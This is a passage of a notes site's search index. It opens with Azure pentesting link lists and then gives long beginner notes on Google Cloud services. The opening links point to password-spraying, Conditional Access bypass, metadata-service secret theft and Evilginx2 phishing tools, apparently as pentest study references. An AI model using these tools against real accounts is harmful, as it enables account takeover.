                                  • GitHub - MarkoH17/Spray365: Spray365 makes spraying Microsoft accounts (Office 365 / Azure AD) easy through its customizable two-step password spraying approach. The built-in execution plan features options that attempt to bypass Azure Smart Lockout and insecure conditional access policies.
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#bypass-conditional-access","title":"Bypass conditional access","text":"
                                  • The Attackers Guide to Azure AD Conditional Access \u2013 Daniel Chronlund Cloud Security Blog
                                  • How to Find MFA Bypasses in Conditional Access Policies - YouTube
                                  • Getting started with ROADrecon \u00b7 dirkjanm/ROADtools Wiki \u00b7 GitHub
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#instance-metadata-service","title":"Instance Metadata Service","text":"
                                  • Steal Secrets with Azure Instance Metadata Service? Don\u2019t Oversight Role-based Access Control | by Marcus Tee | Marcus Tee Anytime | Medium
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#phishing","title":"Phishing","text":"
                                  • Illicit Consent Grant Attack
                                  • Abusing Device Code Flow: - OAuth\u2019s Device Code Flow Abused in Phishing Attacks | Secureworks
                                  • Evilginx2: - GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#lateral-movement","title":"Lateral movement","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#privilege-escalation","title":"Privilege escalation","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#persistence","title":"Persistence","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/containers/pentesting-docker/","title":"Pentesting docker","text":"

                                  https://www.panoptica.app/research/7-ways-to-escape-a-container

                                  ","tags":["cloud","docker","containers"]},{"location":"cloud/gcp/gcp-essentials/","title":"Google Cloud Platform (GCP) Essentials","text":"Sources of this notes
                                  • Udemy course: Google Cloud Platform (GCP) Fundamentals for Beginners

                                  Cheatsheets: gcloud CLI

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#basic-numbers","title":"Basic numbers","text":"
                                  • 20 regions
                                  • 61 zones
                                  • 134 network edge locations
                                  • 200+ countries and territories.

                                  A Region typically has two Zones. A zone is the equivalent of a data center in Google Cloud.

                                  Overview of services:

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#signing-up-with-gcp","title":"Signing-up with GCP","text":"

                                  $300 in free credits to run more than 25 service for free. are provided with 90

                                  Link: https://cloud.google.com/gcp/

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#gcp-resources","title":"GCP resources","text":"

                                  In Google Cloud Platform, everything that you create is a resource. There is a hierarchy:

                                  • Everything that you create is a resource.
                                  • Resources belong to a project.
                                  • A project directly represents a billable unit. It has a credit card associated.
                                  • Projects may be organized into folders (like dev or production), which provide logical grouping of projects.
                                  • Folders belong to one and only one organization.
                                  • The organization is the top level entity in GCP hierarchy.

                                  If you use Google Suite, you will see the organization level and folders. If you don't, you will only have access to projects and resources.

                                  To interact with GCP there are these tools: web console, cloud shell cloud SDK, mobile App, Rest API.

                                  GCP Cloud Shell is an interactive shell environment for GCP, accessible from any web browser, with a preloaded IDE named gcloud, which is the command line utility, and based on a GCE Virtual Machine (provisioned with 5GB persistent disk storage and Debian environment). It has a built-in preview functionality withou dealing with tunneling and other issues.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#2-compute-services","title":"2. Compute Services","text":"

                                  Code is deployed and executed in one of the compute services:

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#21-app-engine","title":"2.1. App Engine","text":"

                                  It's one of the first compute services from Google (PaaS) in 2008. It's a fully managed platform for deploying web apps at scale. It supports multiple languages. It's available in two environments:

                                  • Standard: Applications run in a sandbox.
                                  • Flexible: You have more control on packages and environments. Applications run on docker containers, which are in use to deploy but also to scale apps.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#22-compute-engine-gce","title":"2.2. Compute Engine (GCE)","text":"

                                  Google Compute Engine (GCE) enables Linux and Windows VMs to run on Google's global infraestructure. VMs are based on machine types with varied CPU and RAM configuration.

                                  If you need that VMs are persistent, you need to attach additional storage such standards and SSD disks. Otherwise, when closing the VM you will loose all configurations and setups.

                                  VMs are charged a minimum of 1 minute and in 1 second increments after that. Sustained use discounts are offered for running VMs for a significant portion of the billing month. Committed use discounts are offered for purchases based on1 year or 3 year contracts.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#23-kubernetes-engine","title":"2.3. Kubernetes Engine","text":"
                                  • GKE is a managed environment for deploying containerized applications managed by Kubernetes. Kubernetes was originated on Google but now is open source project part of Cloud-Native Computing Foundation.
                                  • Kubernetes has a control plane and worker node (or multiple).
                                  • GKE provisions worker nodes as GCE VMs. Google manages the control plane (and the master nodes) and that is why is called a managed environment.
                                  • Node pools enable mixing and matching different VM configurations.
                                  • The service is tightly integrated with GCP resources such as networking, storage, and monitoring.
                                  • GKE infrastructure is monitored by Stack Driver, which is the built-in monitoring and tracing platform.
                                  • Auto scaling, automatic upgrades, and node auto-repair are some of the unique features of GKE.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#24-cloud-functions","title":"2.4. Cloud Functions","text":"
                                  • Cloud Functions is a serverless execution environment connecting cloud services for building and connecting cloud services.
                                  • Serverless compute environments execute code in response to an event.
                                  • Cloud Functions supports JavaScript, Python, and Go.
                                  • GCP events fire a Cloud Function through a trigger.
                                  • An example event includes adding an object to a storage bucket.
                                  • Trigger connects the event to the function.
                                  • This is FaaS, Function as a Service.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#3-storage-services","title":"3. Storage Services","text":"
                                  • Storage services add persistence and durability to applications
                                  • Storage services are classified into three types:

                                    • Object storage
                                    • Block storage
                                    • File system
                                  • GCP storage services can be used to store:

                                  • Unstructured data
                                  • Folders and Files
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#31-google-cloud-storage","title":"3.1. Google Cloud Storage","text":"
                                  • Unified object storage for a variety of applications.
                                  • Applications can store and retrieve objects (typically through single API).
                                  • GCS can scale to exabytes of data.
                                  • GCS is designed for 99.999999999% durability.
                                  • GCS can be used to store high-frequency and low-frequency access of data.
                                  • Data can be stored within a single region, dual-region, or multi-region.
                                  • There are three default storage class for the data: Standard, Nearline, and Coldline.
                                  • Launching GCS. When creating a Storage entity in GCP, we will create buckets, which are containers for folders and storage objects. Folders may contain Files. Therefore, Buckets are the highest level container in the GCS hierarchy. As for encryption, you can decided if it is Google-managed key or Customer-managed key. Additionally, retention policy can be added when creating a storage entity. You also have labels. After that you can create folders and allocate files in them.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#32-persistent-disks","title":"3.2. Persistent Disks","text":"
                                  • PD provides reliable block storage for GCE VMs.
                                  • Disks are independent of Compute Engine VMs, which means they can have a different lifecycle.
                                  • Each disk can be up to 64TB in size.
                                  • PDs can have one writer and multiple readers. This is quite unique in GCP. Basically, if you have a scenario where you need to attach the disk to one VM for read-write access but read that data from multiple VMs in a read-only mode, you can do that with persistent disks. So one VM will act as the writer and all other VMs will act as readers. So this gives you the ability to designate one VM for read-write, while adding multiple VMs that are quickly reading from the same disk with a read-only access. This opens up lot of opportunities where you need to create distributed applications with centralized data access.
                                  • Supports both SSD and HDD storage options.
                                  • SSD offers best throughput for I/O intensive applications.
                                  • PD is available in three storage types:
                                    • Zonal.
                                    • Regional.
                                    • Local.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#33-google-cloud-filestore","title":"3.3. Google Cloud Filestore","text":"
                                  • Managed file storage service traditionally for legacy applications.
                                  • Delivers NAS-like filesystem interface and a shared filesystem.
                                  • Centralized, highly-available filesystem for GCE and GKE.
                                  • Exposed as a NFS fileshare with fixed export settings and default Unix permissions.
                                  • Filestore file shares are available as mount points in GCE VMs.
                                  • On-prem applications using NAS take advantage of Filestore.
                                  • Filestore has built-in zonal storage redundancy for data availability.
                                  • Data is always encrypted while in transit.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#4-network-services","title":"4. Network Services","text":"
                                  • Network services are one of the key building blocks of cloud.
                                  • GCP leverages Google\u2019s global network for connectivity.
                                  • Customers can choose between standard and premium tiers. Standard allows you to use the normal backbone of GCP network and Premium gives you access to the premium backbone. Therefore, Standard tier leverages selection of ISP-based internet backbone for connectivity (which is cheaper). GCP uses premium tier as the default option.
                                  • Load balancers route the traffic evenly to multiple endpoints.
                                  • Virtual Private Cloud (VPC) offers private and hybrid networking.
                                  • Customers can extend their data center to GCP through hybrid connectivity.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#41-load-balancers","title":"4.1. Load Balancers","text":"
                                  • Load balancer distributes traffic across multiple GCE VMs in a single or multiple regions.
                                  • There are two types of GCP load balancers:
                                    • HTTP(S) load balancer, which provides global load balancing.
                                    • Network load balancer, which balances regional TCP and UDP traffic within the same region. \u2022 Both types can be configured as internal or external load balancers
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#configure-is-a-couple-of-vms-deployed-in-a-region-connected-to-a-load-balancer","title":"Configure is a couple of VMs deployed in a region connected to a load balancer","text":"
                                  • From GCP web dashboard, go to Compute Engine, then Instance Templates.
                                  • Select machine type, disk image, and allow HTTP and HTTPs in firewall configuration since we are launching a web server. Configure automation to get the server running from booting. Add the following script:
                                  # Add the below script while creating the instance template \n\n#! /bin/bash \napt-get update \napt-get install -y apache2 \ncat <<EOF > /var/www/html/index.html \n<html><body><h1>Hello from $(hostname)</h1> \n</body></html> \nEOF \n
                                  • Create the template.
                                  • Now go to Instance group for setting up the deployment. Configure multiple zones, select the instance template (the one you created before) and the number of instances to deploy. Create a Health Check. Launch the instance group and in a few minutes you will have the 2 web servers (Go to VM instances to see them).
                                  • Go to Network section, then Load balancing and click on create load balancer, and follow the creation tunnel.
                                  • The first step is creating a backend configuration. So the backend configuration will ensure that we have a set of resources responsible for serving the traffic. Options to configure there:

                                    • Network endpoint groups // Or // Instance groups : choose the backend type as the instance group and choose the web server instance group we have launched in the previous step. Port is 80. That is the default port on which Apache is listening.
                                    • Balancing mode: traffic can be routed based on CP utilization or the request per second. If you are not going to send a lot of traffic, choose rate.
                                    • The maximum RPS, 100.
                                    • Associate this backend with the health check created earlier. This health check will be a checkpoint for the load balancer to decide whether to route the traffic to the instance or not. If the health check fails for one of the instances load balancer will gracefully send a request to the other instance and this will enhance the user experience where they only see only see the output coming from healthy instances.
                                  • The second step is setting up host and path rules, there are not multiple endpoints, leave that as the default.

                                  • Third step, Front end configuration. The front end is basically how the consumer or the client of your application sees the endpoint. Configure it:
                                    • Provide a name.
                                    • Protocol is HTTP.
                                    • Premium, this is the network service there.
                                    • IPv4, it's an ephemeral IP address.
                                  • Fourth step, review settings.

                                  In about five minutes, the load balancer will be completely functioning, which means it will be able to route the traffic to one of the instances in the backend group, which is based on the instance template that we created. By accessing to the load balancer IP:80 you will be redirected each time to a different machine.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#42-virtual-private-cloud-vpc","title":"4.2. Virtual Private Cloud (VPC)","text":"
                                  • VPC is a software defined network providing private networking for VMs.
                                  • VPC network is a global resource with regional subnets.
                                  • Each VPC is logically isolated from each other.
                                  • Firewall rules allow or restrict traffic within subnets. Default option is deny.
                                  • Resources within a VPC communicate via IPV4 addresses and there is a DNS service within VPC that provides name resolution.
                                  • VPC networks can be connected to other VPC networks through VPC peering.
                                  • VPC networks are securely connected in hybrid environments using Cloud VPN or Cloud Interconnect.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#43-hybrid-connectivity","title":"4.3. Hybrid Connectivity","text":"
                                  • Hybrid connectivity extends local data center to GCP.
                                  • Three GCP services enable hybrid connectivity:
                                    • Cloud Interconnect: Cloud Interconnect extends on-premises network to GCP via Dedicated or Partner Interconnect.
                                    • Cloud VPN: Cloud VPN connects on-premises environment to GCP securely over the internet through IPSec VPN.
                                    • Peering: Peering enables direct access to Google Cloud resources with reduced Internet egress fee
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#5-identity-access-management","title":"5. Identity & Access Management","text":"
                                  • IAM controls access by defining who (identity) has what access (role) for which resource. Members (who), roles (what) , and permissions (which).
                                  • Cloud IAM is based on the principle of least privilege.
                                  • An IAM policy binds identity to roles which contains permissions.

                                  Where do you use IAM?

                                  \u2022 To share GCP resources with fine-grained control. \u2022 Selectively allow/deny permissions to individual resources. \u2022 Define custom roles that are specific to a team/organization. \u2022 Enable authentication of applications through service accounts.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#51-cloud-iam-identity","title":"5.1. Cloud IAM Identity","text":"

                                  A Google account is a Cloud IAM user so anyone with a gmail account or a google account will become visible as a cloud IAM user.

                                  A Service account is a special type of user. It's meant for applications to talk to GCP resources.

                                  A Google group is also a valid user or a member in Cloud IAM because it represents a logical entity that is a collection of users.

                                  A G Suite domain like yourorganization.com is also a valid user or a member. You can assign permissions to an entire G Suite domain.

                                  If you are not part of google, you can use Cloud Identity Service to create a Cloud identity domain, that is also a valid Cloud IAM user.

                                  And \"allAuthenticatedUsers\" is also an entity that allows you to assign permissions to all users authenticated through Google's authentication system.

                                  Last, \"allUsers\" assigns permissions even to anonymous users.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#52-cloud-iam-permissions","title":"5.2. Cloud IAM Permissions","text":"
                                  • Permissions determine the operations performed on a resource (launch an instance, deploy an object into a store bucket.)
                                  • Correspond 1:1 with REST methods of GCP resources. GCP is based on a collection of APIs.
                                  • Each GCP resource exposes REST APIs to perform operations.
                                  • Permissions are directly mapped to each REST API.
                                    • Publisher.Publish() -> pubsub.topics.publish.
                                  • Permissions cannot be assigned directly to members/users, but to a role. You group multiple permissions into a role and to assign that role to a member.
                                  • One or more permissions are assigned to an IAM Role
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#53-cloud-iam-roles","title":"5.3. Cloud IAM Roles","text":"

                                  Roles are a logical grouping of permissions.

                                  • Primitive roles:
                                    • Owner: unlimited access to a resource.
                                    • Editor.
                                    • Viewer.
                                  • Predefined roles that associate a set of operations typically associated to objects. Every object in GCP has a set of predefined roles:
                                    • roles/pubsub.publisher
                                    • roles/compute.admin
                                    • roles/storage.objectAdmin
                                  • Custom roles:
                                    • Collection of assorted set of permissions.
                                    • Fine-grained access to resources.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#54-key-elements-of-cloud-iam","title":"5.4. Key Elements of Cloud IAM","text":"
                                  • Resource \u2013 Any GCP resource
                                    • Projects
                                    • Cloud Storage Buckets
                                    • Compute Engine Instances
                                    • ...
                                  • Permissions - Determines operations allowed on a resource
                                    • Syntax for calling permissions:
                                      <service>.<resource>.<verb>\n    - pubsub.subscriptions.consume\n    - compute.instances.insert\n
                                  • Roles \u2013 A collection of permissions

                                    • Compute.instanceAdmin
                                      • compute.instances.start
                                      • compute.instances.stop
                                      • compute.instances.delete
                                      • \u2026.
                                  • Users \u2013 Represents an identity

                                    • Google Account
                                    • Google Group
                                    • G Suite Domain
                                    • \u2026
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#55-service-accounts","title":"5.5. Service Accounts","text":"
                                  • A special Google account that belongs to an application or VM. It doesn't represent an user or identities.
                                  • Service account is identified by its unique email address assigned by GCP, you don't have control on it, it's automatically created by GCP.
                                  • Service accounts are associated with key-pairs used for authentication . This key is the token that identified the application.
                                  • Two types of service accounts:
                                    • User managed, which can be associated with a role.
                                    • Google managed.
                                  • Each service account is associated with one or more roles.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#6-database-services","title":"6. Database Services","text":"
                                  • GCP has managed relational and NoSQL database services.
                                  • Traditional web and line-of-business apps may use RDBMS.
                                  • Modern applications rely on NoSQL databases.
                                  • Google has Web-scale, distributed applications need multi-region databases.
                                  • In-memory database is used for accelerating the performance of apps
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#61-google-cloud-sql","title":"6.1. Google Cloud SQL","text":"
                                  • One of the most common services in GCP.
                                  • Fully managed RDBMS service that simplifies set up, maintain, manage, and administer database instances.
                                  • Cloud SQL supports three types of RDBMS (Relational DataBase Management Servers):
                                    • MySQL
                                    • PostgreSQL
                                    • Microsoft SQL Server (Preview)
                                  • A managed alternative to running RDBMS in VMs.
                                  • Cloud SQL delivers scalability, availability, security, and reliability of database instances.
                                  • Cloud SQL instances may be launched within VPC for additional security.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#62-google-clod-bigtable","title":"6.2. Google Clod Bigtable","text":"
                                  • Petabyte-scale, managed NoSQL database service.
                                  • Sparsely populated table that can scale to billions of rows and thousands of columns.
                                  • Storage engine for large-scale, low-latency applications.
                                  • Ideal for throughput-intensive data processing and analytics.
                                  • An alternative to running Apache HBase column-oriented database in VMs.
                                  • Acts as a storage engine for MapReduce operations, stream processing, and machine-learning applications
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#63-google-cloud-spanner","title":"6.3. Google Cloud Spanner","text":"
                                  • Managed, scalable, relational database service for regional and global application data.
                                  • Scales horizontally across rows, regions, and continents.
                                  • Brings best of relational and NoSQL databases.
                                  • Supports ACID transactions and ANSI SQL queries.
                                  • Data is replicated synchronously with globally strong consistency.
                                  • Cloud Spanner instances run in one of the three region types:
                                    • Read-write
                                    • Read-only
                                    • Witness
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#64-google-cloud-memorystore","title":"6.4. Google Cloud Memorystore","text":"
                                  • A fully-managed in-memory data store service for Redis.
                                  • Ideal for application caches that provides sub-millisecond data access.
                                  • Cloud Memorystore can support instances up to 300 GB and network throughput of 12 Gbps.
                                  • Fully compatible with Redis protocol.
                                  • Promises 99.9% availability with automatic failover.
                                  • Integrated with Stackdriver for monitoring.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#7-data-and-analytics-services","title":"7. Data and Analytics Services","text":"
                                  • Data analytics include ingestion, collection, processing, analyzing, visualizing data.
                                  • GCP has a comprehensive set of analytics services.
                                  • Cloud Pub/Sub is typically used for ingesting data at scale, whether it is telemetry data coming from sensors or logs coming from your applications and infrastructure.
                                  • Cloud Dataflow can process data in real-time or batch mode.
                                  • Cloud Dataproc is a Big Data service for running Hadoop and Spark jobs. These are typically used with MapReduce with large data sets that form the big data stores with historical data or data stored in traditional databases.
                                  • BigQuery is the data warehouse in the cloud. Lot of Google Cloud customers rely on BigQuery for analyzing historical data and deriving insights from that.
                                  • Cloud Datalab is used for analyzing and visualizing data
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#71-google-cloud-pub-sub","title":"7.1. Google Cloud Pub / Sub","text":"
                                  • Managed service to ingest data at scale.
                                  • Based on the publishing/subscription pattern. It is built using the published subscribe pattern where you have a set of publishers that send messages to a topic, and there are a set of subscribers that subscribe to the topic, and Pub/Sub provides the infrastructure for the publishers and subscribers to reliably exchange messages.
                                  • Global entry point to GCP-based analytics services.
                                  • Acts as a simple and reliable staging location for data. Pub/Sub is not meant to be a durable data store.
                                  • Tightly integrated with services such as Cloud Storage and Cloud Dataflow.
                                  • Supports at-least-once delivery with synchronous, cross-zone message replication. What this means is you actually get a highly reliable delivery mechanism based on Pub/Sub, and there is redundancy because of cross zone message replication. You don't lose messages when it is sent via Cloud Pub/Sub infrastructure.
                                  • Comes with end-to-end encryption, IAM, and audit logging.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#72-google-cloud-dataflow","title":"7.2. Google Cloud Dataflow","text":"
                                  • Managed service for transforming and enhancing data in stream and batch modes: Cloud Dataflow is meant for transforming and enhancing data, either coming via real-time streams or data stored in Cloud Storage, which is processed in batch mode.
                                  • Based on Apache Beam open source project: Cloud Dataflow is based on an open source project called Apache Beam. Google is one of the key contributors to Apache Beam open source project. And Cloud Dataflow is a commercial implementation of Apache Beam, and it supports a serverless approach, which automates provisioning and management.
                                  • Serverless approach automates provisioning and management: With serverless infrastructure and serverless computing, you don't need to provision resources and scale them manually. Instead, you start streaming the data and connecting that to Dataflow, maybe via Pub/Sub. And it can automatically start processing the data and scales the infrastructure based on the inbound data stream.
                                  • Inbound data can be queried, processed, and extracted for target environment.
                                  • Tightly integrated with Cloud Pub/Sub, BigQuery, and Cloud Machine Learning.
                                  • Cloud Dataflow connector for Kafka makes it easy to integrate Apache Kafka.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#73-google-cloud-dataproc","title":"7.3. Google Cloud Dataproc","text":"
                                  • Managed Apache Hadoop and Apache Spark cluster environments.
                                  • Automated cluster management.
                                  • Clusters can be quickly created and resized from three to hundreds of node.
                                  • Move existing Big Data projects to GCP without redevelopment.
                                  • Frequent updates to Spark, Hadoop, Pig, and Hive and other components of the Apache ecosystem.
                                  • Integrates with other GCP services like Cloud Dataflow and BigQuery

                                  In the Dataproc sync pipeline, data enters through Pub/Sub, gets transformed through Dataflow, and gets processed with Dataproc. Typically in the form of a map reduce job, retain for Apache Hadoop or Apache Spark. And the output of Dataproc can be stored in Big Query, or it can go to Google cloud storage.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#74-google-cloud-datalab","title":"7.4. Google Cloud DataLab","text":"
                                  • Interactive tool for data exploration, analysis, visualization, and machine learning.
                                  • Runs on Compute Engine and may connect to multiple cloud services.
                                  • Built on open source Jupyter Notebooks platform.
                                  • Enables analysis data coming from BigQuery, Cloud ML Engine, and Cloud Storage.
                                  • Supports Python, SQL, and JavaScript languages.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#75-bigquery","title":"7.5. BigQuery","text":"
                                  • Serverless, scalable cloud data warehouse.: \u00a0Google BigQuery is one of the early analytic services that got added to GCP. It's a very powerful, very popular service used by Enterprise customers to analyze data.
                                  • Has an in-memory BI Engine and machine learning built in, so as you query data from BigQuery you can apply machine learning algorithms that can perform predictive analytics right out of the box.
                                  • Supports standard ANSI:2011 SQL dialect for querying. You don't need to learn new languages your domain specific languages to deal with BigQuery. You can use familiar SQL queries that support inner joins, outer joins, group by clauses and WHERE clauses to extract data and to analyze from existing data stores.
                                  • Federated queries can process external data sources. BigQuery can pull the data from all of these sources and can perform one single query that will automatically join and do group by clauses so you get a unified view of the dataset:
                                    • Cloud Storage.
                                    • Cloud Bigtable.
                                    • Spreadsheets (Google Drive).
                                  • Automatically replicates data to keep a seven-day history of changes.
                                  • Supports data integration tools like Informatica and Talend.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#case-use","title":"Case use","text":"

                                  Open BigQuery and open a public dataset. Select Stack Overflow. We will try to extract the number of users in Stack Overflow with gold badges and how many days it took them to get there.

                                  # Run the below SQL statement in BigQuery \n\nSELECT badge_name AS First_Gold_Badge,  \n       COUNT(1) AS Num_Users, \n       ROUND(AVG(tenure_in_days)) AS Avg_Num_Days \nFROM \n( \n  SELECT  \n    badges.user_id AS user_id, \n    badges.name AS badge_name, \n    TIMESTAMP_DIFF(badges.date, users.creation_date, DAY) AS tenure_in_days, \n    ROW_NUMBER() OVER (PARTITION BY badges.user_id \n                       ORDER BY badges.date) AS row_number \n  FROM  \n    `bigquery-public-data.stackoverflow.badges` badges \n  JOIN \n    `bigquery-public-data.stackoverflow.users` users \n  ON badges.user_id = users.id \n  WHERE badges.class = 1  \n)  \nWHERE row_number = 1 \nGROUP BY First_Gold_Badge \nORDER BY Num_Users DESC \nLIMIT 10 \n

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#8-ai-and-ml-services","title":"8. AI and ML Services","text":"
                                  • AI Building Blocks provide AI through simple REST API calls.
                                  • Cloud AutoML enables training models on custom datasets.
                                  • AI Platform provides end-to-end ML pipelines on-premises and cloud.
                                  • AI Hub is a Google hosted repository to discover, share, and deploy ML models.
                                  • Google Cloud Platform offers comprehensive set of ML & AI services for beginners and advanced AI engineers.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#81-ai-building-blocks","title":"8.1. AI Building Blocks","text":"

                                  GCP AI building blocks expose a set of APIs that can deliver AI capabilities without really training models or writing complex piece of code. So GCP AI building blocks are structured into: - Sight, that delivers vision and video based intelligence. - Conversation, which is all about text to speech and speech to text. It also includes dialogue flow, which is powering some of the capabilities that we see in Google Home, Google Assistant, and other conversational user experiences. - Language which is all about translation and natural language which deals with revealing the structure and meaning of text through machine learning. - Structure data that can be used to perform regression, classification, and prediction. - AutoML tables is a service that is meant for performing regression or classification on your structured data. - Recommendations AI deliver personalized product recommendations at scale. - Cloud Inference API is all about running large scale correlations over time series data sets.

                                  So, these are all techniques that can be used directly by consuming the APIs. For example, within vision, you can perform object detection or image classification by simply uploading the image or sending the image to the API. So when you upload an image or when you send the image to the vision API, it comes back with all the objects that are detected within that image or it can even classify the images that are shown in the input. Similarly, when you send text to the text to speech API it'll come back with an audio file that actually speaks out the text that is sent. So these AI building blocks are very useful to infuse AI and intelligence into your applications.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#82-automl","title":"8.2. AutoML","text":"
                                  • Cloud AutoML enables training high-quality models specific to a business problem. What if you want to train a custom model but do not want to write complex code about neural networks or artificial neural networks? Well, that's where the Google Cloud AutoML comes into picture.
                                  • Custom machine learning models without writing code.
                                  • Based on Google\u2019s state-of-the-art machine learning algorithms.
                                  • AutoML Services.
                                    • Sight.
                                      • Vision.
                                      • Video Intelligence.
                                    • Language.
                                      • Natural Language.
                                      • Translation.
                                    • Structure Data.
                                      • Tabular data.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#83-ai-platform","title":"8.3. AI Platform","text":"
                                  • Covers the entire spectrum of machine learning pipelines.
                                  • Built on Kubeflow, an open source ML project based on Kubernetes.
                                  • Includes tools for data preparation, training, and inference

                                  Just like a data processing pipeline, an ML processing pipeline is a comprehensive set of stages combined into a pipeline. And Kubeflow is a project that basically simplifies the process of creating these pipelines with multiple stages This is cube Kubeflow pipeline typical phases:

                                  Google AI platform gives us scalable infrastructure and a framework to deal with this pipeline and multiple stages of this pipeline. Google AI Platform is not just confined to cloud. Customers running on premises Kubernetes infrastructure can deploy AI platform on-prem and it can be seamlessly extended to the cloud which means they can train on-prem but deploy it in the cloud or train in the cloud, but deploy the models on-prem. Kubeflow is the underlying framework and the infrastructure that supports the entire processing pipeline whether it is on-prem or in the public cloud.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#84-ai-hub","title":"8.4. AI Hub","text":"
                                  • Hosted repository of plug-and-play AI components.
                                  • Makes it easy for data scientists and teams to collaborate.
                                  • AI Hub can host private and public content.
                                  • AI Hub includes.
                                    • Kubeflow Pipeline components.
                                    • Jupyter Notebooks.
                                    • TensorFlow modules.
                                      • VM Images.
                                    • Trained models.
                                    • \u2026
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#9-devops-services","title":"9. Devops Services","text":"
                                  • DevOps Services provide tools and frameworks for automation.
                                  • Cloud Source Repositories store and track source code.
                                  • Cloud Build automates continuous integration and deployment.
                                  • Container Registry acts as the central repository for storing, securing, and managing Docker container images.
                                  • IDE and tools integration enables developer productivity.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#91-google-cloud-source-repositories","title":"9.1. Google Cloud Source Repositories","text":"
                                  • Acts as a scalable, private Git repository.
                                  • Extends standard Git workflow to Cloud Build, Cloud Pub/Sub and Compute services: The advantage of using Google Cloud Source Repositories is to maintain the source code very close to your deployment target. That could be compute engine, app engine, functions, or kubernetes engine.
                                  • Unlimited private Git repositories that can mirror code from Github and Bitbucket repos.
                                  • Triggers to automatically build, test, and deploy code.
                                  • Integrated regular expression-based code search.
                                  • Single source of code for deployments across GCE, GAE, GKE, and Functions.

                                  You should consider cloud source repos when you want to manage the life cycle of an application within GCP, all the way from storing the code to deploying and iterating over your code multiple times.

